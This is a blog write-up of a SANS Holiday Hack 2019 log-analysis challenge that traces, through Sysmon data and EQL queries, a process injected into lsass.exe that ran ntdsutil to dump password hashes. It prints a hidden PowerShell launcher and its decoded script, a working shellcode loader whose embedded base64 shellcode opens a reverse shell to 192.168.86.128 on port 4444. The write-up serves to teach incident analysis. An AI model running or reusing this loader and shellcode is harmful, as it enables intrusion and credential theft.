Monday, January 27, 2020

SANS Holiday Hack 2019 - Objective 4: Windows Log Analysis: Determine Attack Technique


The hints for this challenge are given by SugarPlum Mary in Hermey Hall (go to the left side of the quad).  For this one, the hint gives a link to a file that must be downloaded and examined: https://downloads.elfu.org/sysmon-data.json.zip.  SugarPlum Mary's hint also leads to this page:  https://www.endgame.com/our-experts/ross-wolf



Her other hint links are: https://pen-testing.sans.org/blog/2019/12/10/eql-threat-hunting/ and https://www.darkoperator.com/blog/2014/8/8/sysinternals-sysmon



I downloaded the Slingshot VM from here:  https://www.sans.org/slingshot-vmware-linux/download#, as described in this article:  https://pen-testing.sans.org/blog/2019/12/10/eql-threat-hunting/, because it already has the tool installed.  If you decide to download the Slingshot VM, you will have to log in to SANS.org with your SANS creds.  This VM is in OVA format, so it can be opened in a variety of virtualization software.  I used Workstation Pro simply because I'm familiar with it and its cousin, VMware Fusion.  In this software, an OVA must be imported.  In the version I'm using, you simply double-click the downloaded Slingshot image, and it starts the import process.  Name the VM, choose somewhere to store it and click Import.  The virtualization software does the work for you.  Once it's loaded and displayed, log in to the VM with the creds slingshot, slingshot.  Slingshot is a version of Linux, so you may want to read about the Linux OS to use it.


Interestingly, the answer to this challenge is in the article here:  https://pen-testing.sans.org/blog/2019/12/10/eql-threat-hunting/, so people could have guessed the answer.  Many attacks use living off the land as an attack technique.  That means that they use tools natively installed on the OS to avoid detection.  In this case, it was ntdsutil.  This natively installed utility can be used to make a backup of the password hashes.


If you search through the logs, some interesting things can be found.  A good place to start seemed to be what they were asking for: try to find lsass.exe.  eql query -f sysmon-data.json "process where process_name = 'lsass.exe'"  Unfortunately, this doesn't return any results.  Why?  Because in this case, lsass.exe is the parent process of cmd.exe.  eql query -f sysmon-data.json "process where parent_process_name = 'lsass.exe'" reveals this.  Why on Earth would cmd.exe be run with lsass.exe as its parent process?  The Objective question kind of answers it.  Something was injected into the lsass.exe process, causing its evil business to appear to be carried out by lsass.exe.  What was injected into lsass.exe?  Follow the process IDs to answer the Objective.  The pid of this cmd.exe process with the parent process of lsass.exe is 3440.  So, look for this pid being used as the parent process of another process to answer the Objective question.  See, it's ntdsutil.
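The same parent/child walk the two EQL queries perform, written out as an added example (not code from the original post or from the EQL project): start at every process whose parent is lsass.exe, then follow each pid down to its children. The records are constructed to mirror the field names the queries above use (process_name, parent_process_name, pid, ppid); pid 3440 and the process names come from the text, the other values are made up.

```python
# Added example: trace what lsass.exe spawned in Sysmon process-create
# events, the chain lsass.exe -> cmd.exe (pid 3440) -> ntdsutil.exe from
# the text.  Field names are assumed to match the EQL queries above.
import json

# Constructed sample in the shape of sysmon-data.json (not the real file).
SAMPLE_JSON = json.dumps([
    {"event_type": "process", "pid": 3440, "ppid": 632,
     "process_name": "cmd.exe", "parent_process_name": "lsass.exe",
     "command_line": "C:\\Windows\\system32\\cmd.exe"},
    {"event_type": "process", "pid": 3556, "ppid": 3440,
     "process_name": "ntdsutil.exe", "parent_process_name": "cmd.exe",
     "command_line": "ntdsutil.exe"},
    {"event_type": "process", "pid": 4012, "ppid": 1200,
     "process_name": "notepad.exe", "parent_process_name": "explorer.exe",
     "command_line": "notepad.exe"},
])


def load_events(raw_json):
    """Keep only process events; that is what 'process where ...' filters on."""
    return [e for e in json.loads(raw_json) if e.get("event_type") == "process"]


def children_of(events, parent_pid):
    """Equivalent of 'process where ppid == <parent_pid>'."""
    return [e for e in events if e["ppid"] == parent_pid]


def trace_descendants(events, parent_name, max_depth=3):
    """Start at every process whose parent is parent_name (lsass.exe here)
    and list its descendants as (depth, process_name, pid); depth 1 is a
    direct child.  lsass.exe normally spawns nothing, so any hit is worth
    a look."""
    found = []
    frontier = [(1, e) for e in events
                if e["parent_process_name"].lower() == parent_name.lower()]
    while frontier:
        depth, ev = frontier.pop(0)
        found.append((depth, ev["process_name"], ev["pid"]))
        if depth < max_depth:
            frontier.extend((depth + 1, c) for c in children_of(events, ev["pid"]))
    return found


if __name__ == "__main__":
    for depth, name, pid in trace_descendants(load_events(SAMPLE_JSON), "lsass.exe"):
        print(f"{'  ' * depth}{name} (pid {pid})")
```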




For more fun, find out what was injected into lsass.exe.  Many modern attacks are performed with powershell.exe because it's natively installed on Windows 7+ and very powerful.  So, look for the powershell.exe process instead of lsass.exe, and you'll see a strange-looking, memory-resident, base64-encoded, compressed PowerShell payload.  This is commonly done to bypass AV.  You can tell it's encoded because it contains FromBase64String, and compressed because it contains GzipStream.  The long quoted string passed to FromBase64String is the base64-encoded, gzip-compressed stream.

"C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object.System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''<base64 payload omitted>''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"

You can decode and decompress the payload to see what it's trying to run in memory.  A really useful tool is CyberChef.  Simply navigate to https://gchq.github.io/CyberChef/, search for From Base64 and click on it to add it to the recipe, then search for Gunzip and click on it to add it to the recipe, then paste the payload into the input area.  Once it's added, you'll see the script that the PowerShell launcher above is running from a stream in memory.  It's a PowerShell script running in memory.  Powersheption.
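The CyberChef recipe above (From Base64, then Gunzip) as a script, added here as an example that is not from the original post: it pulls the FromBase64String argument out of a launcher command line of the shape shown above, undoes the base64 and gzip layers, and then looks for a further FromBase64String stage in the decoded script, which is how the next payload in the text is found. The command line and the inner script are constructed so the example runs offline; nothing here is the real payload.

```python
# Added example: decode a base64 + gzip PowerShell launcher and look for
# the next embedded stage.  The launcher and inner script are constructed.
import base64
import gzip
import re

# Constructed stand-in for the decoded script; the real one carried shellcode.
INNER_SCRIPT = (
    "$note = 'constructed inner script'\n"
    "[Byte[]]$stage2 = [System.Convert]::FromBase64String(\"SGVsbG8=\")\n"
)

# Matches the argument of FromBase64String(...) whether quoted with ' " or ''.
B64_ARG = re.compile(r"FromBase64String\(\s*['\"]+([A-Za-z0-9+/=]+)['\"]+\s*\)")


def build_sample_cmdline(inner_script):
    """Wrap a script the way the observed launcher does: gzip, then base64,
    fed to a GzipStream over a MemoryStream and read back as text."""
    blob = base64.b64encode(gzip.compress(inner_script.encode("utf-8"))).decode()
    return ("powershell.exe -nop -w hidden -c &([scriptblock]::create((New-Object "
            "System.IO.StreamReader(New-Object System.IO.Compression.GzipStream("
            "(New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String("
            f"'{blob}'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))")


def decode_launcher(cmdline):
    """Return the script carried in the launcher's first FromBase64String call."""
    m = B64_ARG.search(cmdline)
    if not m:
        raise ValueError("no FromBase64String argument found")
    raw = base64.b64decode(m.group(1))
    if raw[:2] == b"\x1f\x8b":      # gzip magic: the GzipStream layer is present
        raw = gzip.decompress(raw)
    return raw.decode("utf-8", errors="replace")


def next_stage_blobs(script):
    """Decode any further FromBase64String arguments (e.g. shellcode) in a script."""
    return [base64.b64decode(b) for b in B64_ARG.findall(script)]


if __name__ == "__main__":
    script = decode_launcher(build_sample_cmdline(INNER_SCRIPT))
    print(script)
    for blob in next_stage_blobs(script):
        print(f"next stage: {len(blob)} bytes, hex {blob.hex()}")
```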


Here is the fully decoded/gunzipped script.  Googling the base64 payload in this script reveals this article:  https://medium.com/@tstillz17/analyzing-obfuscated-powershell-with-shellcode-1b6cb8ab5ab0.  The article shows how to decode the next base64 payload, which is actually shellcode.  Googling the shellcode shows that it's a PowerShell Empire C&C stager that was injected into the lsass.exe process.

Function a2T {
    Param ($ic6T, $ylqn)
    $cL = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object {$_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')

return $cL.GetMethod('GetProcAddress',[Type[]]@([System.Runtime.InteropServices.HandleRef],[String])).Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object
System.Runtime.InteropServices.HandleRef((New-Object IntPtr),($cL.GetMethod('GetModuleHandle')).Invoke($null, @($ic6T)))), $ylqn))
}

function iq {
Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $jd,
        [Parameter(Position = 1)] [Type] $v2a = [Void]
)

$mSSG = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule',$false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$mSSG.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $jd).SetImplementationFlags('Runtime, Managed')
$mSSG.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $v2a, $jd).SetImplementationFlags('Runtime, Managed')
return $mSSG.CreateType()
}

[Byte[]]$s2Tyx =
[System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmjAqFaAaAIAEVyJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+mb////AcMpxnXBw7vgHSoKaKaVvZ3/1TwGfAqA++B1BbtHE3JvagBT/9U=")

$coU = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((a2T kernel32.dll VirtualAlloc), (iq @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $s2Tyx.Length,0x3000,0x40)

[System.Runtime.InteropServices.Marshal]::Copy($s2Tyx, 0, $coU, $s2Tyx.length)

$fM51S = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((a2T kernel32.dll CreateThread), (iq @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr])
([IntPtr]))).Invoke([IntPtr]::Zero,0,$coU,[IntPtr]::Zero,0,[IntPtr]::Zero)

[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((a2T kernel32.dll WaitForSingleObject), (iq @([IntPtr], [Int32]))).Invoke($fM51S,0xffffffff) | Out-Null


The following is the Empire C&C payload taken from the decoded payload above.

[Byte[]]$s2Tyx =
[System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmjAqFaAaAIAEVyJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+mb////AcMpxnXBw7vgHSoKaKaVvZ3/1TwGfAqA++B1BbtHE3JvagBT/9U=")


The following image shows the decoded shell code in hex. 




If you run the shellcode with scdbg, as the author describes in the article https://medium.com/@tstillz17/analyzing-obfuscated-powershell-with-shellcode-1b6cb8ab5ab0, you find that the C&C IP is 192.168.86.128 and the port is 4444.  It's an internal IP.  So maybe someone should check and see if that IP is compromised or one that shouldn't be on the network.


